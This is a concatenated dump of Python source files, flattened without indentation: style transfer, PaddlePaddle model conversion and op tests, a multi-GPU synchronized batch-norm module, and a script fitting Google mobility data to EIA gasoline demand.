for cl in content_losses:
content_score += cl.backward()
run[0] += 1
if run[0] % 50 == 0:
print('run {}:'.format(run))
print('Style Loss : {:4f} Content Loss : {:4f}'.format(
                    style_score.item(), content_score.item()
))
print()
return style_score + content_score
optimizer.step(closure)
input_param.data.clamp_(0, 1)
return input_param.data
output = run_style_transfer(cnn, content_img, style_img, input_img)
def savefig(img_tensor, path='./images/output/', name=os.path.splitext(style_img_name)[0] + content_img_name):
img = img_tensor.cpu()
img = img.view(3, imsize_h, imsize_w)
img = unloader(img)
img.save(path + name)
savefig(output)
# model, style_losses, content_losses = get_style_model_and_losses(cnn, style_img, content_img)
# print(str(model))
``` |
{
"source": "jiweibo/Scripts",
"score": 2
} |
#### File: Scripts/paddle/convert_models.py
```python
import paddle.fluid as fluid
import numpy as np
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='paddle convert inference models.')
parser.add_argument("dirname", type=str, help="source model dir")
parser.add_argument("model_filename", type=str, help="model filename")
parser.add_argument("params_filename", type=str, help="params filename")
parser.add_argument("save_dir", type=str, help="target model dir")
args = parser.parse_args()
return args, parser
def convert():
exe = fluid.Executor(fluid.CPUPlace())
[inference_program, feed_target_names, fetch_targets] = fluid.io.load_inference_model(dirname=args.dirname, executor=exe, model_filename=args.model_filename, params_filename=args.params_filename)
with fluid.program_guard(inference_program):
fluid.io.save_inference_model(args.save_dir, feeded_var_names=feed_target_names, target_vars=fetch_targets, executor=exe)
if __name__ == '__main__':
args, parser = parse_args()
convert()
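# Example invocation (illustrative paths and file names):
#   python convert_models.py ./mobilenet_v1 __model__ __params__ ./mobilenet_v1_split
# This loads a combined-parameter inference model and re-saves it in the default layout of
# fluid.io.save_inference_model (one file per parameter).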
```
#### File: paddle/op/fluid_activation.py
```python
import paddle
import argparse
import numpy as np
import paddle.fluid as fluid
def parse_args():
parser = argparse.ArgumentParser(description='paddle activation op test')
parser.add_argument("op", type=str, choices=['leaky_relu'], help="activation op in 'leaky_relu', default is 'leaky_relu'", default='leaky_relu')
args = parser.parse_args()
return args, parser
def main():
x = fluid.layers.data(name='x', shape=[2], dtype='float32', lod_level=1)
result = fluid.layers.leaky_relu(x, alpha=0.1)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
x_i = np.array([[-1, 2], [3, -4]]).astype(np.float32)
x_d = fluid.create_lod_tensor(x_i, [[1, 1]], fluid.CPUPlace())
result_value, = exe.run(fluid.default_main_program(), feed={'x':x_d}, fetch_list=[result], return_numpy=False)
#print(type(result_value))
print(result_value)
if __name__ == '__main__':
args, parser = parse_args()
#parser.print_help()
main()
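# Expected result (illustrative): leaky_relu with alpha=0.1 maps [[-1, 2], [3, -4]] to
# [[-0.1, 2.0], [3.0, -0.4]]; it is printed as a LoDTensor because return_numpy=False.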
```
#### File: paddle/op/fluid_compare.py
```python
import paddle
import argparse
import numpy as np
import paddle.fluid as fluid
def parse_args():
parser = argparse.ArgumentParser(description='paddle compare op test')
parser.add_argument("op", type=str, choices=['less_than', 'less_equal'], help="compare op in 'less_than', 'less_equal', default is 'less_than'", default='less_than')
args = parser.parse_args()
return args, parser
def main():
x = fluid.layers.data(name='x', shape=[2], dtype='float64', lod_level=1)
y = fluid.layers.data(name='y', shape=[2], dtype='float64', lod_level=1)
# ref = fluid.layers.fill_constant(shape=[2], dtype='float64', value=0)
result = fluid.layers.less_than(x=x, y=y, force_cpu=False)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x_i = np.array([[1, 2], [3, 4]]).astype(np.float64)
y_i = np.array([[2, 2], [1, 3]]).astype(np.float64)
x_d = fluid.create_lod_tensor(x_i, [[1,1]], place)
y_d = fluid.create_lod_tensor(y_i, [[1,1]], place)
result_value, = exe.run(fluid.default_main_program(), feed={'x':x_d, 'y':y_d}, fetch_list=[result], return_numpy=False)
#print(type(result_value))
print(result_value)
print(np.array(result_value))
#print(ref_value)
if __name__ == '__main__':
args, parser = parse_args()
#parser.print_help()
main()
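# Expected result (illustrative): element-wise x < y on the inputs above gives
# [[True, False], [False, False]], returned as a boolean LoDTensor.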
``` |
{
"source": "JiweiMaster/jde",
"score": 2
} |
#### File: jde/utils/syncbn.py
```python
import math
from queue import Queue
from IPython import embed
import torch
import torch.cuda.comm as comm
from torch.nn.modules.batchnorm import _BatchNorm
import torch.nn.functional as F
import syncbn_gpu
class SyncBNFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, x, gamma, beta, running_mean, running_var,
extra, training=True, momentum=0.1, eps=1e-5, sync=True):
def parse_extra(ctx, extra):
ctx.is_master = extra["is_master"]
if ctx.is_master:
ctx.master_queue = extra["master_queue"]
ctx.worker_queues = extra["worker_queues"]
ctx.worker_ids = extra["worker_ids"]
else:
ctx.master_queue = extra["master_queue"]
ctx.worker_queue = extra["worker_queue"]
parse_extra(ctx, extra)
ctx.training = training
ctx.momentum = momentum
ctx.eps = eps
ctx.sync = sync
if ctx.training:
ex, exs = syncbn_gpu.batch_norm_collect_statistics(x)
if ctx.sync:
if ctx.is_master:
ex, exs = [ex.unsqueeze(0)], [exs.unsqueeze(0)]
for _ in range(ctx.master_queue.maxsize):
ex_w, exs_w = ctx.master_queue.get()
ctx.master_queue.task_done()
ex.append(ex_w.unsqueeze(0))
exs.append(exs_w.unsqueeze(0))
ex = comm.gather(ex).mean(0)
exs = comm.gather(exs).mean(0)
tensors = comm.broadcast_coalesced((ex, exs), [ex.get_device()] + ctx.worker_ids)
for ts, queue in zip(tensors[1:], ctx.worker_queues):
queue.put(ts)
else:
ctx.master_queue.put((ex, exs))
ex, exs = ctx.worker_queue.get()
ctx.worker_queue.task_done()
var = exs - ex ** 2
running_mean.mul_(1 - ctx.momentum).add_(ctx.momentum * ex)
running_var.mul_(1 - ctx.momentum).add_(ctx.momentum * var)
ctx.mark_dirty(running_mean, running_var)
y = syncbn_gpu.batch_norm_transform_input(x, gamma, beta, ex, exs, ctx.eps)
ctx.save_for_backward(x, ex, exs, gamma, beta)
return y
@staticmethod
    def backward(ctx, grad_output):
x, ex, exs, gamma, beta = ctx.saved_tensors
grad_gamma, grad_beta, grad_ex, grad_exs = \
            syncbn_gpu.batch_norm_collect_grad_statistics(x, grad_output, gamma, ex, exs, ctx.eps)
if ctx.training:
if ctx.sync:
if ctx.is_master:
grad_ex, grad_exs = [grad_ex.unsqueeze(0)], [grad_exs.unsqueeze(0)]
for _ in range(ctx.master_queue.maxsize):
grad_ex_w, grad_exs_w = ctx.master_queue.get()
ctx.master_queue.task_done()
grad_ex.append(grad_ex_w.unsqueeze(0))
grad_exs.append(grad_exs_w.unsqueeze(0))
grad_ex = comm.gather(grad_ex).mean(0)
grad_exs = comm.gather(grad_exs).mean(0)
tensors = comm.broadcast_coalesced((grad_ex, grad_exs), [grad_ex.get_device()] + ctx.worker_ids)
for ts, queue in zip(tensors[1:], ctx.worker_queues):
queue.put(ts)
else:
ctx.master_queue.put((grad_ex, grad_exs))
grad_ex, grad_exs = ctx.worker_queue.get()
ctx.worker_queue.task_done()
        grad_input = syncbn_gpu.batch_norm_input_backward(x, grad_output, gamma, ex, exs, grad_ex, grad_exs, ctx.eps)
return grad_input, grad_gamma, grad_beta, None, None, None, None, None, None
class SyncBN(_BatchNorm):
def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True, sync=True):
        # forward the constructor arguments instead of re-hardcoding the defaults
        super(SyncBN, self).__init__(num_features, eps=eps, momentum=momentum, affine=affine,
                                     track_running_stats=track_running_stats)
self.devices = list(range(torch.cuda.device_count()))
self.sync = sync if len(self.devices) > 1 else False
self.worker_ids = self.devices[1:]
self.master_queue = Queue(len(self.worker_ids))
self.worker_queues = [Queue(1) for _ in self.worker_ids]
def forward(self, x):
if self.training and self.sync:
if x.get_device() == self.devices[0]:
extra = {
'is_master': True,
'master_queue': self.master_queue,
'worker_queues': self.worker_queues,
'worker_ids': self.worker_ids
}
else:
extra = {
'is_master': False,
'master_queue': self.master_queue,
'worker_queue': self.worker_queues[self.worker_ids.index(x.get_device())]
}
            return SyncBNFunction.apply(x, self.weight, self.bias, self.running_mean, self.running_var,
extra, self.training, self.momentum, self.eps)
else:
exponential_average_factor = 0.0
if self.training and self.track_running_stats:
# TODO: if statement only here to tell the jit to skip emitting this when it is None
if self.num_batches_tracked is not None:
self.num_batches_tracked += 1
if self.momentum is None: # use cumulative moving average
exponential_average_factor = 1.0 / float(self.num_batches_tracked)
else: # use exponential moving average
exponential_average_factor = self.momentum
return F.batch_norm(
x, self.running_mean, self.running_var, self.weight, self.bias,
self.training or not self.track_running_stats,
exponential_average_factor, self.eps)
if __name__ == '__main__':
import numpy as np
device = torch.device('cuda')
torch.manual_seed(123)
x1 = torch.rand(32, 3, 200, 200, device=device, requires_grad=True)
model = SyncBN(3)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=1e-4)
model = torch.nn.DataParallel(model)
model.to(device)
y1 = model(x1)
z = y1.sum()
model.zero_grad()
z.backward()
optimizer.step()
torch.manual_seed(123)
x2 = torch.rand(32, 3, 200, 200, device=device, requires_grad=True)
model = torch.nn.BatchNorm2d(3)
model.to(device)
y2 = model(x2)
z = y2.sum()
model.zero_grad()
z.backward()
grad_x1 = x1.grad.data.cpu()
grad_x2 = x2.grad.data.cpu()
print((grad_x1 - grad_x2).abs().max())
y1 = y1.data.cpu()
y2 = y2.data.cpu()
print((y1 - y2).abs().max())
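# The self-test above runs SyncBN under DataParallel and a vanilla BatchNorm2d on identically
# seeded inputs; if the cross-GPU statistics are gathered correctly, both printed maximum
# absolute differences should be on the order of float32 round-off.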
``` |
{
"source": "jiweiqi/covid19-energy",
"score": 2
} |
#### File: covid19-energy/PODA_Model_Code/PODA_6_GoogleMobility_EIA_Correlation_ActualMobility.py
```python
import pandas as pd
import numpy as np
from scipy.optimize import minimize, Bounds
from myFunctions import createFolder
import matplotlib.pyplot as plt
from sklearn.metrics import r2_score
'''
Data preparation
'''
#weekly fuel demand
today = pd.to_datetime('today')
today = today.strftime("%Y-%m-%d")
today = '2020-09-12'   # pinned to the date of an existing PODA_Model_<date>.npy snapshot loaded below
PODA_Model = np.load("./PODA_Model_"+today+".npy",allow_pickle='TRUE').item()
google_Mobility_Day = PODA_Model['ML_File_Date']
start_Date = '04-05-2020'
end_Date = PODA_Model['ML_File_Date']
# end_Date = today
fuel_Demand_EIA = pd.read_excel('https://www.eia.gov/dnav/pet/xls/PET_CONS_WPSUP_K_W.xls',
sheet_name = 'Data 1',
header=2)
fuel_Demand_EIA['Date'] = pd.to_datetime(fuel_Demand_EIA['Date'])
fuel_Demand_EIA.rename(columns={'Weekly U.S. Product Supplied of Finished Motor Gasoline (Thousand Barrels per Day)':'Gasoline'},
inplace=True)
fuel_Demand_EIA = fuel_Demand_EIA.drop(columns=['Weekly U.S. Product Supplied of Petroleum Products (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Kerosene-Type Jet Fuel (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Distillate Fuel Oil (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Residual Fuel Oil (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Propane and Propylene (Thousand Barrels per Day)',
'Weekly U.S. Product Supplied of Other Oils (Thousand Barrels per Day)'])
fuel_Demand_EIA_save = fuel_Demand_EIA[(fuel_Demand_EIA['Date'] >
pd.to_datetime('01-01-2020'))]
PODA_Model['Fuel_Demand_EIA'] = fuel_Demand_EIA_save
fuel_Demand_EIA = fuel_Demand_EIA[(fuel_Demand_EIA['Date'] > pd.to_datetime(start_Date))
& (fuel_Demand_EIA['Date'] <= pd.to_datetime(end_Date))]
fuel_Demand_EIA = fuel_Demand_EIA.set_index('Date')
case = 'mean'
data_used = PODA_Model['ML_Data']
data_used['date'] = data_used.index
data_used = data_used[(data_used['date'] > (pd.to_datetime(start_Date) - pd.DateOffset(days=7)))
& (data_used['date'] < pd.to_datetime(end_Date))]
NHTS_Category_Share = pd.read_excel('./data/NHTS.xlsx',
sheet_name='Category Share')
NHTS_State_Fuel_Share = pd.read_excel('./data/NHTS.xlsx',
sheet_name='State Fuel Share')
PODA_Model['NHTS Category Share'] = NHTS_Category_Share
PODA_Model['NHTS State Fuel Share'] = NHTS_State_Fuel_Share
df_StateName_Code = pd.read_excel('./data/US_StateCode_List.xlsx',
sheet_name='Sheet1',
header=0)
cols = ['State Name']
data_used = data_used.join(df_StateName_Code.set_index(cols),
on=cols,
how='left')
data_used = data_used.join(NHTS_Category_Share.set_index('State Code'),
on='State Code',
how='left')
EIA_fuel = fuel_Demand_EIA[['Gasoline']]
def min_func(factor):
global EIA_fuel
data_used['work factor'] = 1 + data_used['workplaces']/100*factor[0]
data_used['school factor'] = 1 + data_used['workplaces']/100*factor[1]
data_used['medical factor'] = 1 + data_used['grocery_and_pharmacy']/100*factor[2]
data_used['shopping factor'] = 1 + data_used['grocery_and_pharmacy']/100*factor[3]
data_used['social factor'] = 1 + data_used['retail_and_recreation']/100*factor[4]
data_used['park factor'] = 1 + data_used['parks']/100*factor[5]
data_used['transport someone factor'] = 1 + data_used['retail_and_recreation']/100*factor[7]
data_used['meals factor'] = 1 + data_used['retail_and_recreation']/100*factor[6]
data_used['else factor'] = 1+ data_used['retail_and_recreation']/100*factor[7]
data_used['accumulated factor'] = (
data_used['Work'] * data_used['work factor'] +
data_used['School/Daycare/Religious activity'] * data_used['school factor'] +
data_used['Medical/Dental services']*data_used['medical factor'] +
data_used['Shopping/Errands']*data_used['shopping factor'] +
data_used['Social/Recreational']*factor[8]*data_used['social factor'] +
data_used['Social/Recreational']*(1-factor[8])*data_used['park factor'] +
data_used['Meals']*data_used['meals factor'] +
data_used['Transport someone']*data_used['transport someone factor'] +
data_used['Something else']*data_used['else factor'])/100 + factor[9]
DayShift = int(factor[10])
aa = data_used.join(NHTS_State_Fuel_Share.set_index('State Name'),
on='State Name',
how='left')
aa['fuel factor'] = aa['accumulated factor'] * aa['Percentage gasoline']
x = aa.sum(level='date')
x = x[['fuel factor','WeekDay']]
x['WeekDay'] = x['WeekDay']/50
baseline = 8722
x['Shifted Date'] = x.index + pd.DateOffset(days=DayShift)
for i, date_i in enumerate(fuel_Demand_EIA.index):
Google_weekly = x[(x['Shifted Date']<=pd.to_datetime(date_i))
& (x['Shifted Date']>(pd.to_datetime(date_i)-pd.DateOffset(days=7)))]
EIA_fuel.loc[date_i, 'Google'] = Google_weekly['fuel factor'].mean(axis =0)
EIA_fuel = EIA_fuel.dropna()
EIA_fuel['fuelpred'] = EIA_fuel['Google']*baseline
EIA_fuel['least_square'] = ((EIA_fuel['Gasoline']-EIA_fuel['fuelpred'])/EIA_fuel['Gasoline'])**2
retu = EIA_fuel['least_square'].sum()
return retu
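# min_func maps the Google mobility categories to NHTS trip-purpose activity factors, weights
# them by the NHTS category shares, scales by each state's gasoline share, shifts the daily
# series by factor[10] days, averages it over each EIA reporting week, and returns the sum of
# squared relative errors against the EIA weekly gasoline demand (baseline 8722 kbbl/day).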
#index (0) (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)
x0 = [ 1, 1, 1, 1, 1, 1, 1, 1, 0.5, 0, 0]
bounds = Bounds([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0, 0, 0],
[1.2, 1.2, 1.2, 1.2, 1.2, 2, 1.2, 1.2, 1, 0.05, 10])
res = minimize(min_func, x0, method='SLSQP', bounds=bounds)
print('optim factor = ')
for index, val in np.ndenumerate(res.x):
print('\t factor[{}] = {:.2e}'.format(index[0], val))
print('optim loss = {:.3e}'.format(res.fun))
a = res.x
createFolder('./Fuel Demand Projection')
np.savetxt('./Fuel Demand Projection/Fuel_mobility_factor'
+ google_Mobility_Day +'.csv', a, delimiter = ",")
PODA_Model['Google_Mobility_EIA_Factor'] = a
np.save(("./PODA_Model_"+today+".npy"), PODA_Model)
r2 = r2_score(EIA_fuel['Gasoline'], EIA_fuel['fuelpred'])  # r2_score expects (y_true, y_pred)
print('r2 = {:.4e}'.format(r2))
fig1 = plt.figure(figsize=(6, 5))
ax1 = fig1.add_subplot(1, 1, 1)
ax1.plot(EIA_fuel.index, EIA_fuel['fuelpred'], '-',
label='pred')
ax1.plot(EIA_fuel.index, EIA_fuel['Gasoline'], '--o',
label='EIA')
ax1.set_xlabel('Date')
ax1.set_ylabel('Fuel Demand')
plt.xticks(rotation=45)
ax1.legend()
fig1 = plt.figure(figsize=(6, 5))
ax1 = fig1.add_subplot(1, 1, 1)
ax1.plot(EIA_fuel['Gasoline'], EIA_fuel['fuelpred'], 'o',
label='pred')
ax1.plot([EIA_fuel['Gasoline'].min(), EIA_fuel['Gasoline'].max()],
[EIA_fuel['Gasoline'].min(), EIA_fuel['Gasoline'].max()],
'--',
label='y = x')
ax1.set_xlabel('True')
ax1.set_ylabel('Pred')
ax1.legend()
``` |